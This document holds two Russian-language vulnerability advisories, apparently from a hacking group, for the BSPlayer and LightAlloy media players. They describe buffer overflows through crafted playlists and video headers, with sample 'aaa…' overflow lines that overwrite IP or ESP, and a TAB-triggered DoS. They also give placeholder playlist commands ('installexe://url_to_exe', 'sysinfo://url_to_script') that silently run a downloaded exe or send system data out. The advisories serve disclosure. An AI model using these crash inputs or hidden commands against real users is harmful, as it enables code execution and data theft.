|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
[New Wave Hack Team advisory]
[Product: BSPlayer ]
[Version: <=0.87 (>0.87?) ]
[1. Переполнение буфера при разборе плейлистов (*.bsl)]
Фрагмент плейлиста:
...
F:\Video\animatrix.avi
F:\Video\antitrust.AVI
aaa..(всего a*1024)aaaa
...
Он устанавливает значение IP в 0x61616161.
[2. DOS при разборе плейлистов]
При встрече символа с кодом 0x09 (TAB) в имени файла, уровень загрузки процессора близок к 100%.
[3. "Пасхальные яйца" в версии для Windows]
Указанные ниже команды можно передать через плейлист (возможно, существуют и альтернативные пути).
Установка кодеков без оповещения пользователя (exe-файл запускается без предупреждения):
installexe://url_to_exe
Передача информации о системе (передается методом POST скрипту):
sysinfo://url_to_script
[New Wave Hack Team advisory]
[Product: LightAlloy ]
[Version: <=2.0 ]
[1. Переполнение буфера при проигрывании видеофайла]
При встрече в начале файла 80 подряд идущих нулей (0x00), 512 следующих байт заносятся в память, а IP принимает значение, лежащее по смещению 0x0250.
[2. Переполнение буфера при разборе плейлиста LightAlloy.lap]
Эта уязвимость представляет очень малую опасность, т.к. плейлист всего лишь один, и он создается и редактируется исключительно самой программой.
...
C:\Video\Семь.avi
>N Семь
C:\Video\Пункт назначения.avi
>N Пункт назначения
C:\Video\Пункт назначения.avi
>N aaa..(ax512)aaaa
...
Вызывает сообщение "программа выполнила недопустимую операцию и будет закрыта". При этом ESP=0x61616161.
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
